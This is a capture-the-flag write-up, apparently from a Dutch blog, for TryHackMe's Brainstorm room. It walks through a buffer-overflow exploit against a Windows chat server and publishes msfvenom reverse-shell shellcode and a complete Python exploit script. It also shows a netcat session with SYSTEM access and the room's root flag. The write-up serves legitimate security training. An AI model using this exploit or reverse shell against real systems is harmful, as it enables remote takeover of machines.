thm-brainstorm-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play  Tryhackme’s BrainStorm at

https://tryhackme.com/room/brainstorm

Enumeration

Run nmap to scan port

nmap -sS -sV -A -Pn 10.10.239.61

As a result, there are 3 ports used, port 21, 3389 and 9999 . In which port 21 allows anonymous FTP access.

Check the FTP port

FTP to the service server using an anonymous account

Use dir to check the ftp directory

Access the directory and check, there are 2 files chatserver.exe and essfunc.dll. This is the chat server file that the server is using to listen on port 9999

Download Binary 2 file for analysis. (If not set Binary, 2 download files will always be missing dozens of bytes, and cannot be executed)

Analysis chatserver.exe

Open chatserver.exe with Immunity Debugger

Create a pattern to pass test input.

Use python to send this pattern to the server

Buffer overflow occurs. The EIP value to be entered is 31704330.

Use pattern_offet. We see that offset is 2012, meaning that the buffer string has size of 2012 bytes. Including 2008 byte data + 4 bytes EBP + 4 bytes EIP.

So we know where the EIP is located, and from which we can control the EIP.

Control EIP

Use ! Mona jmp -r esp to find the address of the JMP ESP instruction in memory

This article will take address 0x62501527 to use for payload.

Notice here that the ASLR and SafeSEH protection mechanisms are disabled.

The payload for JMP ESP address will be written in reverse and in hex format like ‘\ x27 \ x15 \ x50 \ x62’

Exploit Development

Use msfvenom tool to generate payload

root@kali:~/thm/brainstorm# msfvenom -p windows/exec -b ‘\x00\x0A’ -f python CMD=calc.exe EXITFUNC=thread
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of python file: 1060 bytes
buf = ""
buf += "\xdb\xd8\xd9\x74\x24\xf4\x5d\x31\xc9\xb1\x31\xb8\xb1"
buf += "\xc8\x5c\x5b\x83\xc5\x04\x31\x45\x14\x03\x45\xa5\x2a"
buf += "\xa9\xa7\x2d\x28\x52\x58\xad\x4d\xda\xbd\x9c\x4d\xb8"
buf += "\xb6\x8e\x7d\xca\x9b\x22\xf5\x9e\x0f\xb1\x7b\x37\x3f"
buf += "\x72\x31\x61\x0e\x83\x6a\x51\x11\x07\x71\x86\xf1\x36"
buf += "\xba\xdb\xf0\x7f\xa7\x16\xa0\x28\xa3\x85\x55\x5d\xf9"
buf += "\x15\xdd\x2d\xef\x1d\x02\xe5\x0e\x0f\x95\x7e\x49\x8f"
buf += "\x17\x53\xe1\x86\x0f\xb0\xcc\x51\xbb\x02\xba\x63\x6d"
buf += "\x5b\x43\xcf\x50\x54\xb6\x11\x94\x52\x29\x64\xec\xa1"
buf += "\xd4\x7f\x2b\xd8\x02\xf5\xa8\x7a\xc0\xad\x14\x7b\x05"
buf += "\x2b\xde\x77\xe2\x3f\xb8\x9b\xf5\xec\xb2\xa7\x7e\x13"
buf += "\x15\x2e\xc4\x30\xb1\x6b\x9e\x59\xe0\xd1\x71\x65\xf2"
buf += "\xba\x2e\xc3\x78\x56\x3a\x7e\x23\x3c\xbd\x0c\x59\x72"
buf += "\xbd\x0e\x62\x22\xd6\x3f\xe9\xad\xa1\xbf\x38\x8a\x4e"
buf += "\x22\xe9\xe6\xe6\xfb\x78\x4b\x6b\xfc\x56\x8f\x92\x7f"
buf += "\x53\x6f\x61\x9f\x16\x6a\x2d\x27\xca\x06\x3e\xc2\xec"
buf += "\xb5\x3f\xc7\x8e\x58\xac\x8b\x7e\xff\x54\x29\x7f"

Generating working shellcode !

root@kali:~/thm# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.122 LPORT=7777 -b"\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] = 
"\xbf\xe9\xe6\x28\x5f\xda\xd7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x31\x7a\x12\x83\xea\xfc\x03\x93\xe8\xca\xaa\x9f\x1d\x88"
"\x55\x5f\xde\xed\xdc\xba\xef\x2d\xba\xcf\x40\x9e\xc8\x9d\x6c"
"\x55\x9c\x35\xe6\x1b\x09\x3a\x4f\x91\x6f\x75\x50\x8a\x4c\x14"
"\xd2\xd1\x80\xf6\xeb\x19\xd5\xf7\x2c\x47\x14\xa5\xe5\x03\x8b"
"\x59\x81\x5e\x10\xd2\xd9\x4f\x10\x07\xa9\x6e\x31\x96\xa1\x28"
"\x91\x19\x65\x41\x98\x01\x6a\x6c\x52\xba\x58\x1a\x65\x6a\x91"
"\xe3\xca\x53\x1d\x16\x12\x94\x9a\xc9\x61\xec\xd8\x74\x72\x2b"
"\xa2\xa2\xf7\xaf\x04\x20\xaf\x0b\xb4\xe5\x36\xd8\xba\x42\x3c"
"\x86\xde\x55\x91\xbd\xdb\xde\x14\x11\x6a\xa4\x32\xb5\x36\x7e"
"\x5a\xec\x92\xd1\x63\xee\x7c\x8d\xc1\x65\x90\xda\x7b\x24\xfd"
"\x2f\xb6\xd6\xfd\x27\xc1\xa5\xcf\xe8\x79\x21\x7c\x60\xa4\xb6"
"\x83\x5b\x10\x28\x7a\x64\x61\x61\xb9\x30\x31\x19\x68\x39\xda"
"\xd9\x95\xec\x4d\x89\x39\x5f\x2e\x79\xfa\x0f\xc6\x93\xf5\x70"
"\xf6\x9c\xdf\x18\x9d\x67\x88\x2c\x69\x64\x32\x59\x6f\x6a\xdc"
"\xf8\xe6\x8c\x8a\xea\xae\x07\x23\x92\xea\xd3\xd2\x5b\x21\x9e"
"\xd5\xd0\xc6\x5f\x9b\x10\xa2\x73\x4c\xd1\xf9\x29\xdb\xee\xd7"
"\x45\x87\x7d\xbc\x95\xce\x9d\x6b\xc2\x87\x50\x62\x86\x35\xca"
"\xdc\xb4\xc7\x8a\x27\x7c\x1c\x6f\xa9\x7d\xd1\xcb\x8d\x6d\x2f"
"\xd3\x89\xd9\xff\x82\x47\xb7\xb9\x7c\x26\x61\x10\xd2\xe0\xe5"
"\xe5\x18\x33\x73\xea\x74\xc5\x9b\x5b\x21\x90\xa4\x54\xa5\x14"
"\xdd\x88\x55\xda\x34\x09\x65\x91\x14\x38\xee\x7c\xcd\x78\x73"
"\x7f\x38\xbe\x8a\xfc\xc8\x3f\x69\x1c\xb9\x3a\x35\x9a\x52\x37"
"\x26\x4f\x54\xe4\x47\x5a";
root@kali:~/thm# gedit shell.py

The above payload will use the reverse shell bind tcp, use port 7777 and have removed the bad characters x00 

After the payload, we write python to exploit, with the following payload

Payload = 2012 bytes junk + 4 bytes EIP + 16 bytes NOPS + Shellcode + junk

Execute the python file above ( after the calc is popping o.k.)

Finaly working with

https://github.com/puckiestyle/python/blob/master/thm-brainstorm-revshell.py

root@kali:~/thm# cat shell.py 
import socket
import sys

username = b"puckie"

message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32

#generated with msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.122 LPORT=7777 -b"\x00" -f c

payload = (b"\xbf\xe9\xe6\x28\x5f\xda\xd7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
b"\x52\x31\x7a\x12\x83\xea\xfc\x03\x93\xe8\xca\xaa\x9f\x1d\x88"
b"\x55\x5f\xde\xed\xdc\xba\xef\x2d\xba\xcf\x40\x9e\xc8\x9d\x6c"
b"\x55\x9c\x35\xe6\x1b\x09\x3a\x4f\x91\x6f\x75\x50\x8a\x4c\x14"
b"\xd2\xd1\x80\xf6\xeb\x19\xd5\xf7\x2c\x47\x14\xa5\xe5\x03\x8b"
b"\x59\x81\x5e\x10\xd2\xd9\x4f\x10\x07\xa9\x6e\x31\x96\xa1\x28"
b"\x91\x19\x65\x41\x98\x01\x6a\x6c\x52\xba\x58\x1a\x65\x6a\x91"
b"\xe3\xca\x53\x1d\x16\x12\x94\x9a\xc9\x61\xec\xd8\x74\x72\x2b"
b"\xa2\xa2\xf7\xaf\x04\x20\xaf\x0b\xb4\xe5\x36\xd8\xba\x42\x3c"
b"\x86\xde\x55\x91\xbd\xdb\xde\x14\x11\x6a\xa4\x32\xb5\x36\x7e"
b"\x5a\xec\x92\xd1\x63\xee\x7c\x8d\xc1\x65\x90\xda\x7b\x24\xfd"
b"\x2f\xb6\xd6\xfd\x27\xc1\xa5\xcf\xe8\x79\x21\x7c\x60\xa4\xb6"
b"\x83\x5b\x10\x28\x7a\x64\x61\x61\xb9\x30\x31\x19\x68\x39\xda"
b"\xd9\x95\xec\x4d\x89\x39\x5f\x2e\x79\xfa\x0f\xc6\x93\xf5\x70"
b"\xf6\x9c\xdf\x18\x9d\x67\x88\x2c\x69\x64\x32\x59\x6f\x6a\xdc"
b"\xf8\xe6\x8c\x8a\xea\xae\x07\x23\x92\xea\xd3\xd2\x5b\x21\x9e"
b"\xd5\xd0\xc6\x5f\x9b\x10\xa2\x73\x4c\xd1\xf9\x29\xdb\xee\xd7"
b"\x45\x87\x7d\xbc\x95\xce\x9d\x6b\xc2\x87\x50\x62\x86\x35\xca"
b"\xdc\xb4\xc7\x8a\x27\x7c\x1c\x6f\xa9\x7d\xd1\xcb\x8d\x6d\x2f"
b"\xd3\x89\xd9\xff\x82\x47\xb7\xb9\x7c\x26\x61\x10\xd2\xe0\xe5"
b"\xe5\x18\x33\x73\xea\x74\xc5\x9b\x5b\x21\x90\xa4\x54\xa5\x14"
b"\xdd\x88\x55\xda\x34\x09\x65\x91\x14\x38\xee\x7c\xcd\x78\x73"
b"\x7f\x38\xbe\x8a\xfc\xc8\x3f\x69\x1c\xb9\x3a\x35\x9a\x52\x37"
b"\x26\x4f\x54\xe4\x47\x5a")

try:
print("Sending the payload ...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.190.194',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + payload + b'\r\n')
s.recv(1024)
s.close()

except:
print("Cannot connect to the server ...")
sys.exit()

root@kali:~/thm#

.

Whoami check and Read the flag file

root@kali:~/thm# nc -nlvp 7777
listening on [any] 7777 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.190.194] 49206
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Users\drake\Desktop>type root.txt
type root.txt
5b1001de5a44eca47eee71e7942a8f8a
C:\Users\drake\Desktop>systeminfo
systeminfo

Host Name: BRAINSTORM
OS Name: Microsoft Windows 7 Ultimate 
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: drake
Registered Organization: 
Product ID: 00426-292-0000007-85799
Original Install Date: 8/29/2019, 10:20:47 PM
System Boot Time: 5/29/2020, 3:05:43 AM
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version: Xen 4.2.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,048 MB
Available Physical Memory: 1,509 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,389 MB
Virtual Memory: In Use: 706 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB2621440
[02]: KB976902
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Local Area Connection 2
DHCP Enabled: Yes
DHCP Server: 10.10.0.1
IP address(es)
[01]: 10.10.190.194
[02]: fe80::9839:cf64:53c8:aba2

C:\Users\drake\Desktop>

if you need the files to localy exploit chatserver , it’s exe and dll are at https://github.com/puckiestyle/pentest/blob/master/chatserver.zip

Author : PuckieStyle

 

Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *